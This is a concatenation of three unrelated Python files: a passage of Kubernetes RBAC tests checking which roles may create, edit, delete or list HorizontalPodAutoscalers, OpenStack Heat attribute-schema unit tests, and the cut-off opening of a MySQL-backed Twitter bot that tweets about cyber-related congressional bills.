        remove_resource(newhpa)
        remove_resource(newworkload)
    else:
        # NOTE(review): project/ns/token are re-fetched here even though the
        # else-branch above already obtained them for this role.
        project = rbac_get_project()
        ns = rbac_get_namespace()
        user_token = rbac_get_user_token_by_role(PROJECT_READ_ONLY)
        readonly_user_client = get_project_client_for_token(project,
                                                            user_token)
        # Verify Read Only member cannot create hpa objects
        with pytest.raises(ApiError) as e:
            create_hpa(readonly_user_client, ns)
        assert e.value.error.status == 403
        assert e.value.error.code == 'Forbidden'
    if(user_project is not None):
        remove_resource(user_project)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_create_negative(role, remove_resource):
    """Creating an HPA in an UNSHARED project must fail for every role
    except the cluster owner (who succeeds)."""
    if (role == CLUSTER_OWNER):
        print(role)
        unshared_project = rbac_get_unshared_project()
        ns = rbac_get_unshared_ns()
        user_token = rbac_get_user_token_by_role(role)
        p_client = get_project_client_for_token(unshared_project, user_token)
        hpa, workload = create_hpa(p_client, ns)
        remove_resource(hpa)
        remove_resource(workload)
    else:
        unshared_project = rbac_get_unshared_project()
        ns = rbac_get_unshared_ns()
        cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
        owner_client = get_project_client_for_token(unshared_project,
                                                    cluster_owner_token)
        # Workload created by cluster owner in unshared project is passed as
        # parameter to create HPA
        workload = create_workload(owner_client, ns)
        user_token = rbac_get_user_token_by_role(role)
        p_client = get_project_client_for_token(unshared_project, user_token)
        # The restricted role must not be able to create an HPA there.
        with pytest.raises(ApiError) as e:
            create_hpa(p_client, ns, workload=workload)
        assert e.value.error.status == 403
        assert e.value.error.code == 'Forbidden'
        remove_resource(workload)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_edit(role, remove_resource):
    """Write-capable roles can edit an HPA in the shared project; the
    read-only and cluster-member cases are delegated to helpers."""
    if (role == PROJECT_READ_ONLY):
        verify_hpa_project_readonly_edit(remove_resource)
        return
    if (role == CLUSTER_MEMBER):
        verify_hpa_cluster_member_edit(remove_resource)
        return
    token = rbac_get_user_token_by_role(role)
    shared_project = rbac_get_project()
    shared_ns = rbac_get_namespace()
    client = get_project_client_for_token(shared_project, token)
    hpa, workload = edit_hpa(client, shared_ns)
    remove_resource(hpa)
    remove_resource(workload)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_edit_negative(role, remove_resource):
    """Editing an HPA in an UNSHARED project succeeds only for the cluster
    owner; every other role must be rejected."""
    if (role == CLUSTER_OWNER):
        unshared_project = rbac_get_unshared_project()
        ns = rbac_get_unshared_ns()
        user_token = rbac_get_user_token_by_role(role)
        p_client = get_project_client_for_token(unshared_project, user_token)
        hpa, workload = edit_hpa(p_client, ns)
        remove_resource(hpa)
        remove_resource(workload)
    else:
        unshared_project = rbac_get_unshared_project()
        user_token = rbac_get_user_token_by_role(role)
        unshared_ns = rbac_get_unshared_ns()
        user_client = get_project_client_for_token(unshared_project,
                                                   user_token)
        cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
        # Cluster owner client created in the unshared project
        cluster_owner_p_client = \
            get_project_client_for_token(unshared_project, cluster_owner_token)
        # Verify that some users cannot edit hpa created by cluster owner
        verify_edit_forbidden(user_client, remove_resource,
                              cluster_owner_client=cluster_owner_p_client,
                              ns=unshared_ns)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_delete(role, remove_resource):
    """Write-capable roles can delete an HPA; a read-only member deleting a
    cluster owner's HPA must get 403."""
    user_project = None
    if(role == CLUSTER_MEMBER):
        user_token = rbac_get_user_token_by_role(CLUSTER_MEMBER)
        user_project, ns = create_project_and_ns(user_token,
                                                 namespace["cluster"],
                                                 random_test_name(
                                                     "cluster-mem"))
        p_client = get_project_client_for_token(user_project, user_token)
    else:
        user_token = rbac_get_user_token_by_role(role)
        project = rbac_get_project()
        ns = rbac_get_namespace()
        p_client = get_project_client_for_token(project, user_token)
    if (role != PROJECT_READ_ONLY):
        hpa, workload = create_hpa(p_client, ns)
        delete_hpa(p_client, hpa, ns)
        remove_resource(workload)
        # NOTE(review): the hpa was already deleted above; presumably
        # remove_resource tolerates already-gone resources -- confirm.
        remove_resource(hpa)
        if user_project is not None:
            remove_resource(user_project)
    if (role == PROJECT_READ_ONLY):
        project = rbac_get_project()
        ns = rbac_get_namespace()
        cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
        cluster_owner_p_client = \
            get_project_client_for_token(project, cluster_owner_token)
        user_token = rbac_get_user_token_by_role(PROJECT_READ_ONLY)
        user_client = get_project_client_for_token(project, user_token)
        # As a Cluster owner create a HPA object
        hpa, workload = create_hpa(cluster_owner_p_client, ns)
        # Verify that the Read Only member cannot delete the HPA objects
        # created by Cluster Owner
        with pytest.raises(ApiError) as e:
            delete_hpa(user_client, hpa, ns)
        assert e.value.error.status == 403
        assert e.value.error.code == 'Forbidden'
        remove_resource(hpa)
        remove_resource(workload)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_delete_negative(role, remove_resource):
    """Deleting an HPA in an UNSHARED project succeeds only for the cluster
    owner; every other role must receive 403."""
    if (role == CLUSTER_OWNER):
        print(role)
        unshared_project = rbac_get_unshared_project()
        ns = rbac_get_unshared_ns()
        user_token = rbac_get_user_token_by_role(role)
        p_client = get_project_client_for_token(unshared_project, user_token)
        hpa, workload = create_hpa(p_client, ns)
        delete_hpa(p_client, hpa, ns)
        remove_resource(hpa)
        remove_resource(workload)
    else:
        unshared_project = rbac_get_unshared_project()
        ns = rbac_get_unshared_ns()
        cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
        owner_client = get_project_client_for_token(unshared_project,
                                                    cluster_owner_token)
        workload = create_workload(owner_client, ns)
        user_token = rbac_get_user_token_by_role(role)
        # Workload created by cluster owner in unshared project is passed as
        # parameter to create HPA
        # (``workload`` is rebound here, but create_hpa returns the same
        # workload it was given, so the cleanup below still targets it)
        hpa, workload = create_hpa(owner_client, ns, workload=workload)
        p_client = get_project_client_for_token(unshared_project, user_token)
        with pytest.raises(ApiError) as e:
            delete_hpa(p_client, hpa, ns)
        assert e.value.error.status == 403
        assert e.value.error.code == 'Forbidden'
        remove_resource(hpa)
        remove_resource(workload)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_list(remove_resource, role):
    """Every role that can see a project can list the HPA in it.

    Cluster members operate in a dedicated project of their own; all other
    roles list an HPA created by the cluster owner in the shared project.
    """
    user_project = None
    if(role == CLUSTER_MEMBER):
        cluster_member_token = rbac_get_user_token_by_role(CLUSTER_MEMBER)
        user_project, ns = \
            create_project_and_ns(cluster_member_token,
                                  namespace["cluster"],
                                  random_test_name("cluster-mem"))
        user_client = get_project_client_for_token(user_project,
                                                   cluster_member_token)
        # As a cluster member create a HPA and he should be able to list it
        hpa, workload = create_hpa(user_client, ns)
    else:
        cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
        project = rbac_get_project()
        cluster_owner_p_client = \
            get_project_client_for_token(project, cluster_owner_token)
        user_token = rbac_get_user_token_by_role(role)
        project = rbac_get_project()
        ns = rbac_get_namespace()
        user_client = get_project_client_for_token(project, user_token)
        hpa, workload = create_hpa(cluster_owner_p_client, ns)
    hpaname = hpa.name
    hpadict = user_client.list_horizontalPodAutoscaler(name=hpaname)
    print(hpadict)
    hpadata = hpadict.get('data')
    assert len(hpadata) == 1
    assert hpadata[0].type == "horizontalPodAutoscaler"
    assert hpadata[0].name == hpaname
    remove_resource(hpa)
    remove_resource(workload)
    # BUGFIX: the guard used to test ``user_client`` (always non-None), which
    # passed None to remove_resource for non-cluster-member roles; guard on
    # ``user_project`` like the sibling tests do.
    if user_project is not None:
        remove_resource(user_project)
@if_test_rbac
@pytest.mark.parametrize("role", rbac_role_list)
def test_rbac_hpa_list_negative(remove_resource, role):
    """Roles without access to an unshared project must see an empty HPA
    list there; the cluster owner (who has access) sees his own HPA."""
    if (role == CLUSTER_OWNER):
        unshared_project = rbac_get_unshared_project()
        ns = rbac_get_unshared_ns()
        user_token = rbac_get_user_token_by_role(role)
        p_client = get_project_client_for_token(unshared_project, user_token)
        hpa, workload = create_hpa(p_client, ns)
        hpaname = hpa.name
        hpadict = p_client.list_horizontalPodAutoscaler(name=hpaname)
        hpadata = hpadict.get('data')
        assert len(hpadata) == 1
        assert hpadata[0].type == "horizontalPodAutoscaler"
        assert hpadata[0].name == hpaname
        remove_resource(hpa)
        remove_resource(workload)
    else:
        cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
        unshared_project = rbac_get_unshared_project()
        ns = rbac_get_unshared_ns()
        cluster_owner_client = \
            get_project_client_for_token(unshared_project, cluster_owner_token)
        user_token = rbac_get_user_token_by_role(role)
        user_client = get_project_client_for_token(unshared_project,
                                                   user_token)
        hpa, workload = create_hpa(cluster_owner_client, ns)
        hpaname = hpa.name
        # Verify length of HPA list is zero
        hpadict = user_client.list_horizontalPodAutoscaler(name=hpaname)
        hpadata = hpadict.get('data')
        assert len(hpadata) == 0
        remove_resource(hpa)
        remove_resource(workload)
def verify_hpa_cluster_member_edit(remove_resource):
    """A cluster member can edit an HPA in his own project but must be
    forbidden from editing one created by the cluster owner."""
    member_token = rbac_get_user_token_by_role(CLUSTER_MEMBER)
    member_project, member_ns = create_project_and_ns(member_token,
                                                      namespace["cluster"],
                                                      random_test_name("cluster-mem"))
    member_client = get_project_client_for_token(member_project,
                                                 member_token)
    # The member owns this project, so editing an HPA he created succeeds.
    hpa, workload = edit_hpa(member_client, member_ns)
    # Editing an HPA created by the cluster owner must be forbidden.
    verify_edit_forbidden(member_client, remove_resource)
    remove_resource(hpa)
    remove_resource(workload)
    remove_resource(member_project)
def verify_hpa_project_readonly_edit(remove_resource):
    """A read-only project member must not be able to edit any HPA."""
    shared_project = rbac_get_project()
    readonly_token = rbac_get_user_token_by_role(PROJECT_READ_ONLY)
    readonly_client = get_project_client_for_token(shared_project,
                                                   readonly_token)
    verify_edit_forbidden(readonly_client, remove_resource)
def verify_edit_forbidden(user_client, remove_resource,
                          cluster_owner_client=None, ns=None):
    """Assert that *user_client* receives 403 when updating an HPA that was
    created by the cluster owner.

    When *cluster_owner_client* and *ns* are omitted, both are derived from
    the shared RBAC project.
    """
    metrics = [{
        'name': 'cpu',
        'type': 'Resource',
        'target': {
            'type': 'Utilization',
            'utilization': '50',
        },
    }]
    # NOTE(review): this guard regenerates the pair only when BOTH are None;
    # passing exactly one of them would crash below -- presumably callers
    # always pass both or neither. Confirm before relaxing.
    if(cluster_owner_client is None and ns is None):
        project = rbac_get_project()
        ns = rbac_get_namespace()
        cluster_owner_token = rbac_get_user_token_by_role(CLUSTER_OWNER)
        cluster_owner_client = \
            get_project_client_for_token(project, cluster_owner_token)
    # Create HPA as a cluster owner
    hpa, workload = create_hpa(cluster_owner_client, ns)
    # Verify editing HPA fails
    with pytest.raises(ApiError) as e:
        user_client.update(hpa,
                           name=hpa['name'],
                           namespaceId=ns.id,
                           maxReplicas=10,
                           minReplicas=3,
                           workload=workload.id,
                           metrics=metrics)
    assert e.value.error.status == 403
    assert e.value.error.code == 'Forbidden'
    remove_resource(hpa)
    remove_resource(workload)
def create_hpa(p_client, ns, workload=None):
    """Create a CPU-utilization HPA (min 2, max 5) for *workload*.

    A fresh deployment with a CPU reservation is created when *workload* is
    not supplied.  Waits for the HPA to activate and verifies the workload
    scaled up to minReplicas.  Returns (hpa, workload).
    """
    if workload is None:
        workload = create_workload(p_client, ns)
    hpa_name = random_test_name("hpa")
    cpu_metric = {
        'name': 'cpu',
        'type': 'Resource',
        'target': {
            'type': 'Utilization',
            'utilization': '50',
        },
    }
    hpa = p_client.create_horizontalPodAutoscaler(
        name=hpa_name,
        namespaceId=ns.id,
        maxReplicas=5,
        minReplicas=2,
        workloadId=workload.id,
        metrics=[cpu_metric]
    )
    hpa = wait_for_hpa_to_active(p_client, hpa)
    assert hpa.type == "horizontalPodAutoscaler"
    assert hpa.name == hpa_name
    assert hpa.minReplicas == 2
    assert hpa.maxReplicas == 5
    # Once active, the workload must have scaled up to minReplicas.
    deployments = p_client.list_workload(uuid=workload.uuid).data
    validate_workload(p_client, deployments[0], "deployment", ns.name,
                      pod_count=hpa.minReplicas)
    return (hpa, workload)
def edit_hpa(p_client, ns):
    """Create a memory-based HPA (min 2, max 4), then edit it to (min 3,
    max 6) and verify the workload rescales.  Returns (updated_hpa, workload).
    """
    # Create workload of scale 1 with memory reservation
    # Create hpa pointing to the workload.Edit HPA and verify HPA is functional
    workload = create_workload(p_client, ns)
    name = random_test_name("default")
    # Memory metric: target an average of 32Mi per pod.
    metrics = [{
        "type": "Resource",
        "name": "memory",
        "target": {
            "type": "AverageValue",
            "value": None,
            "averageValue": "32Mi",
            "utilization": None,
            "stringValue": "32"
        }
    }]
    hpa = p_client.create_horizontalPodAutoscaler(
        name=name,
        namespaceId=ns.id,
        maxReplicas=4,
        minReplicas=2,
        workloadId=workload.id,
        metrics=metrics
    )
    wait_for_hpa_to_active(p_client, hpa)
    # After hpa becomes active, the workload scale should be equal to the
    # minReplicas set in HPA
    workloadlist = p_client.list_workload(uuid=workload.uuid).data
    validate_workload(p_client, workloadlist[0], "deployment", ns.name,
                      pod_count=hpa.minReplicas)
    # Edit the HPA
    updated_hpa = p_client.update(hpa,
                                  name=hpa['name'],
                                  namespaceId=ns.id,
                                  maxReplicas=6,
                                  minReplicas=3,
                                  workloadId=workload.id,
                                  metrics=metrics)
    wait_for_hpa_to_active(p_client, updated_hpa)
    assert updated_hpa.type == "horizontalPodAutoscaler"
    assert updated_hpa.minReplicas == 3
    assert updated_hpa.maxReplicas == 6
    # After hpa becomes active, the workload scale should be equal to the
    # minReplicas set in the updated HPA
    wait_for_pods_in_workload(p_client, workload, 3)
    workloadlist = p_client.list_workload(uuid=workload.uuid).data
    validate_workload(p_client, workloadlist[0], "deployment", ns.name,
                      pod_count=updated_hpa.minReplicas)
    return (updated_hpa, workload)
def delete_hpa(p_client, hpa, ns):
    """Delete *hpa*, then verify its removal via the project API listing
    and via ``kubectl get hpa``."""
    hpaname = hpa['name']
    p_client.delete(hpa)
    # Sleep to allow HPA to be deleted
    time.sleep(5)
    timeout = 30
    hpadict = p_client.list_horizontalPodAutoscaler(name=hpaname)
    print(hpadict.get('data'))
    start = time.time()
    if len(hpadict.get('data')) > 0:
        testdata = hpadict.get('data')
        # NOTE(review): the loop condition indexes testdata[0]['data'] rather
        # than checking the names in the list -- TODO confirm this ever
        # matches; as written it likely exits immediately.
        while hpaname in testdata[0]['data']:
            if time.time() - start > timeout:
                raise AssertionError("Timed out waiting for deletion")
            time.sleep(.5)
            hpadict = p_client.list_horizontalPodAutoscaler(name=hpaname)
            testdata = hpadict.get('data')
        assert True  # NOTE(review): no-op assertion, verifies nothing
    if len(hpadict.get('data')) == 0:
        assert True  # NOTE(review): no-op assertion, verifies nothing
    # Verify hpa is deleted by "kubectl get hpa" command
    command = "get hpa {} --namespace {}".format(hpa['name'], ns.name)
    print("Command to obtain the hpa")
    print(command)
    result = execute_kubectl_cmd(command, json_out=False, stderr=True)
    print(result)
    print("Verify that the hpa does not exist "
          "and the error code returned is non zero ")
    # NOTE(review): ``result`` is kubectl's captured output compared against
    # the integer 0, and the branch only runs ``assert True`` -- this check
    # can never fail.  TODO confirm intent.
    if result != 0:
        assert True
def create_workload(p_client, ns):
    """Deploy a single-container workload with CPU/memory requests and
    limits, validate the deployment, and return it."""
    container = {
        "name": "test1",
        "image": TEST_IMAGE,
        "resources": {
            "requests": {
                "memory": "64Mi",
                "cpu": "100m"
            },
            "limits": {
                "memory": "512Mi",
                "cpu": "1000m"
            }
        }
    }
    workload_name = random_test_name("workload")
    workload = p_client.create_workload(name=workload_name,
                                        containers=[container],
                                        namespaceId=ns.id)
    print(workload.scale)
    validate_workload(p_client, workload, "deployment", ns.name)
    return workload
# BUGFIX: autouse expects a bool; the string "True" only worked because any
# non-empty string is truthy.
@pytest.fixture(scope='module', autouse=True)
def create_project_client(request):
    """Module-scoped fixture: create a test project + namespace, publish the
    clients through the shared ``namespace`` dict, and delete the project on
    teardown."""
    client, cluster = get_user_client_and_cluster()
    create_kubeconfig(cluster)
    p, ns = create_project_and_ns(
        ADMIN_TOKEN, cluster, random_test_name("testhpa"))
    p_client = get_project_client_for_token(p, ADMIN_TOKEN)
    namespace["p_client"] = p_client
    namespace["ns"] = ns
    namespace["cluster"] = cluster
    namespace["project"] = p
    def fin():
        # Deleting the project also removes the namespace and workloads in it.
        client = get_admin_client()
        client.delete(namespace["project"])
    request.addfinalizer(fin)
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from heat.engine import attributes
from heat.engine import resources
from heat.engine import support
from heat.tests import common
class AttributeSchemaTest(common.HeatTestCase):
    """Tests for attributes.Schema serialization and conversion."""
    def test_schema_all(self):
        """dict(Schema) emits the description, plus type when one is set."""
        d = {'description': 'A attribute'}
        s = attributes.Schema('A attribute')
        self.assertEqual(d, dict(s))
        d = {'description': 'Another attribute',
             'type': 'string'}
        s = attributes.Schema('Another attribute',
                              type=attributes.Schema.STRING)
        self.assertEqual(d, dict(s))
    def test_all_resource_schemata(self):
        """Every registered resource's attribute schema converts cleanly."""
        for resource_type in resources.global_env().get_types():
            for schema in six.itervalues(getattr(resource_type,
                                                 'attributes_schema',
                                                 {})):
                attributes.Schema.from_attribute(schema)
    def test_from_attribute_new_schema_format(self):
        """from_attribute() returns Schema instances unchanged."""
        s = attributes.Schema('Test description.')
        self.assertIs(s, attributes.Schema.from_attribute(s))
        self.assertEqual('Test description.',
                         attributes.Schema.from_attribute(s).description)
        s = attributes.Schema('Test description.',
                              type=attributes.Schema.MAP)
        self.assertIs(s, attributes.Schema.from_attribute(s))
        self.assertEqual(attributes.Schema.MAP,
                         attributes.Schema.from_attribute(s).type)
    def test_schema_support_status(self):
        """Schemas default to SUPPORTED; an explicit DEPRECATED status keeps
        both its status and its message."""
        schema = {
            'foo_sup': attributes.Schema(
                'Description1'
            ),
            'bar_dep': attributes.Schema(
                'Description2',
                support_status=support.SupportStatus(
                    support.DEPRECATED,
                    'Do not use this ever')
            )
        }
        attrs = attributes.Attributes('test_rsrc', schema, lambda d: d)
        self.assertEqual(support.SUPPORTED,
                         attrs._attributes['foo_sup'].support_status().status)
        self.assertEqual(support.DEPRECATED,
                         attrs._attributes['bar_dep'].support_status().status)
        self.assertEqual('Do not use this ever',
                         attrs._attributes['bar_dep'].support_status().message)
class AttributeTest(common.HeatTestCase):
    """Test the Attribute class."""

    def test_as_output(self):
        """An Attribute renders as a CFN-style Output mapping."""
        attr = attributes.Attribute(
            "test1", attributes.Schema("The first test attribute"))
        expected = {
            "Value": {"Fn::GetAtt": ["test_resource", "test1"]},
            "Description": "The first test attribute"
        }
        self.assertEqual(expected, attr.as_output("test_resource"))

    def test_as_output_hot(self):
        """An Attribute renders as a HOT-style output mapping."""
        attr = attributes.Attribute(
            "test1", attributes.Schema("The first test attribute"))
        expected = {
            "value": {"get_attr": ["test_resource", "test1"]},
            "description": "The first test attribute"
        }
        self.assertEqual(expected, attr.as_output("test_resource", "hot"))
class AttributesTest(common.HeatTestCase):
    """Test the Attributes class."""

    def setUp(self):
        super(AttributesTest, self).setUp()
        # Resolver mock stands in for the resource's attribute resolver;
        # each test programs its return_value/side_effect as needed.
        self.resolver = mock.MagicMock()
        self.attributes_schema = {
            "test1": attributes.Schema("Test attrib 1"),
            "test2": attributes.Schema("Test attrib 2"),
            "test3": attributes.Schema(
                "Test attrib 3",
                # CACHE_NONE: this attribute is re-resolved on every access.
                cache_mode=attributes.Schema.CACHE_NONE)
        }

    def test_get_attribute(self):
        """Test that we get the attribute values we expect."""
        self.resolver.return_value = "value1"
        attribs = attributes.Attributes('test resource',
                                        self.attributes_schema,
                                        self.resolver)
        self.assertEqual("value1", attribs['test1'])
        self.resolver.assert_called_once_with('test1')

    def test_attributes_representation(self):
        """Test that attributes are displayed correctly via str()."""
        self.resolver.return_value = "value1"
        attribs = attributes.Attributes('test resource',
                                        self.attributes_schema,
                                        self.resolver)
        # All three schema entries resolve to the same mocked value.
        msg = 'Attributes for test resource:\n\tvalue1\n\tvalue1\n\tvalue1'
        self.assertEqual(msg, str(attribs))
        calls = [
            mock.call('test1'),
            mock.call('test2'),
            mock.call('test3')
        ]
        self.resolver.assert_has_calls(calls, any_order=True)

    def test_get_attribute_none(self):
        """Test that a None attribute value is returned as None."""
        self.resolver.return_value = None
        attribs = attributes.Attributes('test resource',
                                        self.attributes_schema,
                                        self.resolver)
        self.assertIsNone(attribs['test1'])
        self.resolver.assert_called_once_with('test1')

    def test_get_attribute_nonexist(self):
        """Test that an unknown attribute raises KeyError, unresolved."""
        self.resolver.return_value = "value1"
        attribs = attributes.Attributes('test resource',
                                        self.attributes_schema,
                                        self.resolver)
        self.assertRaises(KeyError, attribs.__getitem__, 'not there')
        # The resolver must not be invoked for a missing attribute.
        self.assertFalse(self.resolver.called)

    def test_as_outputs(self):
        """Test that the CFN Output format works as expected."""
        expected = {
            "test1": {
                "Value": {"Fn::GetAtt": ["test_resource", "test1"]},
                "Description": "Test attrib 1"
            },
            "test2": {
                "Value": {"Fn::GetAtt": ["test_resource", "test2"]},
                "Description": "Test attrib 2"
            },
            "test3": {
                "Value": {"Fn::GetAtt": ["test_resource", "test3"]},
                "Description": "Test attrib 3"
            },
            # The stack-id pseudo attribute maps to the resource reference.
            "OS::stack_id": {
                "Value": {"Ref": "test_resource"},
            }
        }
        MyTestResourceClass = mock.MagicMock()
        MyTestResourceClass.attributes_schema = {
            "test1": attributes.Schema("Test attrib 1"),
            "test2": attributes.Schema("Test attrib 2"),
            "test3": attributes.Schema("Test attrib 3"),
            # test4 is HIDDEN and must not appear in the outputs above.
            "test4": attributes.Schema(
                "Test attrib 4",
                support_status=support.SupportStatus(status=support.HIDDEN))
        }
        self.assertEqual(
            expected,
            attributes.Attributes.as_outputs("test_resource",
                                             MyTestResourceClass))

    def test_as_outputs_hot(self):
        """Test that the HOT output format works as expected."""
        expected = {
            "test1": {
                "value": {"get_attr": ["test_resource", "test1"]},
                "description": "Test attrib 1"
            },
            "test2": {
                "value": {"get_attr": ["test_resource", "test2"]},
                "description": "Test attrib 2"
            },
            "test3": {
                "value": {"get_attr": ["test_resource", "test3"]},
                "description": "Test attrib 3"
            },
            # The stack-id pseudo attribute maps to the resource reference.
            "OS::stack_id": {
                "value": {"get_resource": "test_resource"},
            }
        }
        MyTestResourceClass = mock.MagicMock()
        MyTestResourceClass.attributes_schema = {
            "test1": attributes.Schema("Test attrib 1"),
            "test2": attributes.Schema("Test attrib 2"),
            "test3": attributes.Schema("Test attrib 3"),
            # test4 is HIDDEN and must not appear in the outputs above.
            "test4": attributes.Schema(
                "Test attrib 4",
                support_status=support.SupportStatus(status=support.HIDDEN))
        }
        self.assertEqual(
            expected,
            attributes.Attributes.as_outputs("test_resource",
                                             MyTestResourceClass,
                                             "hot"))

    def test_caching_local(self):
        """Cached attributes resolve once until reset_resolved_values()."""
        self.resolver.side_effect = ["value1", "value1 changed"]
        attribs = attributes.Attributes('test resource',
                                        self.attributes_schema,
                                        self.resolver)
        # Second access returns the cached value without re-resolving.
        self.assertEqual("value1", attribs['test1'])
        self.assertEqual("value1", attribs['test1'])
        attribs.reset_resolved_values()
        # After a reset the resolver runs again and the new value shows.
        self.assertEqual("value1 changed", attribs['test1'])
        calls = [
            mock.call('test1'),
            mock.call('test1')
        ]
        self.resolver.assert_has_calls(calls)

    def test_caching_none(self):
        """CACHE_NONE attributes are re-resolved on every access."""
        self.resolver.side_effect = ["value3", "value3 changed"]
        attribs = attributes.Attributes('test resource',
                                        self.attributes_schema,
                                        self.resolver)
        self.assertEqual("value3", attribs['test3'])
        self.assertEqual("value3 changed", attribs['test3'])
        calls = [
            mock.call('test3'),
            mock.call('test3')
        ]
        self.resolver.assert_has_calls(calls)
class AttributesTypeTest(common.HeatTestCase):
    """Type-validation scenarios for attribute values."""

    # Scenario matrix — presumably consumed by the scenario runner that
    # HeatTestCase wires up (testscenarios-style; verify in common module).
    # Each entry injects a_type, a value expected to validate cleanly,
    # and an invalid_value expected to be logged as a type mismatch.
    scenarios = [
        ('string_type',
         dict(a_type=attributes.Schema.STRING,
              value='correct value',
              invalid_value=[])),
        ('list_type',
         dict(a_type=attributes.Schema.LIST,
              value=[],
              invalid_value='invalid_value')),
        ('map_type',
         dict(a_type=attributes.Schema.MAP,
              value={},
              invalid_value='invalid_value')),
        ('integer_type',
         dict(a_type=attributes.Schema.INTEGER,
              value=1,
              invalid_value='invalid_value')),
        ('boolean_type',
         dict(a_type=attributes.Schema.BOOLEAN,
              value=True,
              invalid_value='invalid_value')),
        # String spellings of booleans are accepted for BOOLEAN attributes.
        ('boolean_type_string_true',
         dict(a_type=attributes.Schema.BOOLEAN,
              value="True",
              invalid_value='invalid_value')),
        ('boolean_type_string_false',
         dict(a_type=attributes.Schema.BOOLEAN,
              value="false",
              invalid_value='invalid_value'))
    ]

    def test_validate_type(self):
        """_validate_type() logs a mismatch message only for bad values."""
        resolver = mock.Mock()
        msg = 'Attribute test1 is not of type %s' % self.a_type
        attr_schema = attributes.Schema("Test attribute", type=self.a_type)
        attrs_schema = {'res1': attr_schema}
        attr = attributes.Attribute("test1", attr_schema)
        attribs = attributes.Attributes('test res1', attrs_schema, resolver)
        # Valid value: no mismatch message in the captured log output.
        attribs._validate_type(attr, self.value)
        self.assertNotIn(msg, self.LOG.output)
        # Invalid value: the mismatch message must be logged.
        attribs._validate_type(attr, self.invalid_value)
        self.assertIn(msg, self.LOG.output)
| |
"""
Description:
This program implements a simple Twitter bot that tweets information about bills in Congress
that are (in)directly related to cyber issues. This bot uses a MySQL database backend to
keep track of bills, both posted and unposted (i.e., tweeted and yet to be tweeted, respectively).
For this initial proof of concept, bill data are scraped from the official US Government
Publishing Office website. For future versions, it would probably be better to connect to a
less cumbersome endpoint like ProPublica.
Module:
This module implements the BillDB class.
Libraries:
This program makes use of the following libraries:
lxml
Stephan Richter / Infrae
BSD License
http://lxml.de/
xmltodict
Martin Blech & contribs.
MIT License
https://github.com/martinblech/xmltodict
python-twitter
Mike Taylor ('bear') & contribs.
Apache License 2.0
https://github.com/bear/python-twitter
requests
Kenneth Reitz
Apache License 2.0
http://docs.python-requests.org/en/master
MySQL Connector
Oracle & affiliates
Misc. License
https://dev.mysql.com/doc/connector-python/en/
License:
Copyright 2017 J. Michael Beaver
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
References:
https://www.gpo.gov/fdsys/bulkdata/BILLSTATUS/resources/BILLSTATUS-XML_User-Guide-v1.pdf
https://github.com/usgpo/bill-status/blob/master/BILLSTATUS-XML_User_User-Guide.md
https://projects.propublica.org/api-docs/congress-api/endpoints/
https://github.com/bear/python-twitter
https://github.com/martinblech/xmltodict
http://docs.python-requests.org/en/master
https://dev.mysql.com/doc/connector-python/en/
http://lxml.de/
https://www.python.org/dev/peps/pep-0249
https://is.gd/apishorteningreference.php
https://www.pantz.org/software/mysql/mysqlcommands.html
https://bitbucket.org/ned/coveragepy/commits/f8e9d62f1412
https://www.govtrack.us/api/v2/role
https://choosealicense.com/licenses/apache-2.0/
http://www.mysqltutorial.org/getting-started-mysql-python-connector/
"""
import requests
from dbconfig import read_db_config
from mysql.connector import MySQLConnection, Error
from mysql.connector.cursor import MySQLCursor
class BillDB:
    """Database connection and operations interface.

    This class should be used to interface with the database backend.
    Any operations that depend on data storage or retrieval should
    be achieved using this class.

    Attributes:
        dbconfig: Database connection configuration information.
        conn: MySQL database connector.
        cursor: Connector cursor object.
        session: Requests session for connecting to websites (e.g., is.gd).
        isgdquota: Used to rate limit against the is.gd API.
        ISGD_RATE_LIMIT: Constant rate limit set by the is.gd API.
    """

    ISGD_RATE_LIMIT = 200  # 200 requests / hour => 4800 requests / day

    # Columns that callers must always supply when inserting/updating.
    _REQUIRED_KEYS = ('type', 'number', 'sponsor', 'title', 'full_url',
                      'introduced')

    # Python 2/3 compatibility: `basestring` only exists on Python 2.
    # Referencing it directly (as this module originally did) raises
    # NameError on Python 3, so resolve the valid string types once here.
    try:
        _STRING_TYPES = (basestring,)  # noqa: F821 -- Python 2 only
    except NameError:
        _STRING_TYPES = (str,)

    def __init__(self):
        """Inits the class.

        Raises:
            Exception: Failure to establish database connection
                or a Requests session.
        """
        try:
            self.dbconfig = read_db_config()
            self.conn = MySQLConnection(**self.dbconfig)
            self.cursor = self.conn.cursor(buffered=True)
            self.session = requests.Session()
            self.isgdquota = 0
        except Exception as e:
            raise Exception(e)

    def close(self):
        """Closes database cursor and connection."""
        if self.cursor:
            self.cursor.close()
        if self.conn:
            self.conn.close()

    @staticmethod
    def _check_required(info, required):
        """Raises Exception if any key in `required` is absent from `info`."""
        if any(key not in info for key in required):
            raise Exception('Input missing data!')

    @staticmethod
    def _row_args(info):
        """Builds the column-value tuple shared by insert_row/update_row.

        Optional fields default to None (short_url, updated) and
